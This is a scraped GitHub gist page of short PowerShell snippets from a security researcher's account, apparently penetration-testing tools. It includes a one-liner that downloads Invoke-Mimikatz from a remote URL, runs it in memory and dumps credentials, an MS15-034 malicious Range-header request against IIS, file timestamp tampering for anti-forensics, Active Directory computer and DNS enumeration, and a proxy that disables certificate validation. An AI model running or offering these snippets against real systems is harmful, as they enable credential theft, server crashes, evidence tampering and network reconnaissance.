Skip to content

Instantly share code, notes, and snippets.

View gist:f24832d8b02288ab6532
$wc=new-object net.webclient
$im=$wc.downloadstring('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
iex $im
invoke-mimikatz -DumpCreds
@obscuresec
obscuresec / Get-AdDnsRecords
Last active Aug 27, 2016
Get-AdDnsRecords
View Get-AdDnsRecords
function Get-ADDNSRecords {
<#
update of dns-dump.ps1 by Michael B. Smith
michael at smithcons dot com
https://github.com/mmessano/PowerShell/blob/master/dns-dump.ps1
#>
Param(
[string]$zone = "$env:USERDNSDOMAIN",
[string]$dc = "$(($env:LOGONSERVER).trim('\'))"
)
View ms15-034.cmd
powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()}
View gist:25e8a142eb08bf237799
function Set-MacAttribute {
<#
.SYNOPSIS
Sets the modified, accessed and created (Mac) attributes for a file based on another file or input.
PowerSploit Function: Set-MacAttribute
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
@obscuresec
obscuresec / psproxy.ps1
Created May 19, 2014
Simple but dirty Powershell web proxy
View psproxy.ps1
#simple and dirty proxy
#usage: http://127.0.0.1:8000/?url=http://www.obscuresec.com
$Up = "http://+:8000/"
$Hso = New-Object Net.HttpListener
$Wco = New-Object Net.Webclient
#ignore self-signed/invalid ssl certs
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$True}
Foreach ($P in $Up) {$Hso.Prefixes.Add($P)}
View gist:bd30a8431ee4bc32f1cd
powershell.exe -com '([adsisearcher]'objectCategory=Computer').Findall() | ForEach {$_.properties.cn}'
@obscuresec
obscuresec / base64padding.ps1
Created Apr 15, 2015
Base64 Padding in PowerShell
View base64padding.ps1
# define and encode test data
$TestString = 'This is a test. A short test for encoding and padding.'
$Encoded = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($TestString))
# insert random '='
$Length = $Encoded.Length
$RandomChar = 1..($Length - 3) | Get-Random
$Encoded = $Encoded.Insert($RandomChar,'=')
# strip out '='
View gist:7b0cf71d7a8dd5e7b54c
PowerShell.exe -com {$file=(gi c:\demo\test.txt);$date='01/03/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
@obscuresec
obscuresec / dirtywebserver.ps1
Created May 18, 2014
Dirty PowerShell Webserver
View dirtywebserver.ps1
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8000/")
$Hso.Start()
While ($Hso.IsListening) {
$HC = $Hso.GetContext()
$HRes = $HC.Response
$HRes.Headers.Add("Content-Type","text/plain")
$Buf = [Text.Encoding]::UTF8.GetBytes((GC (Join-Path $Pwd ($HC.Request).RawUrl)))
$HRes.ContentLength64 = $Buf.Length
$HRes.OutputStream.Write($Buf,0,$Buf.Length)
You can’t perform that action at this time.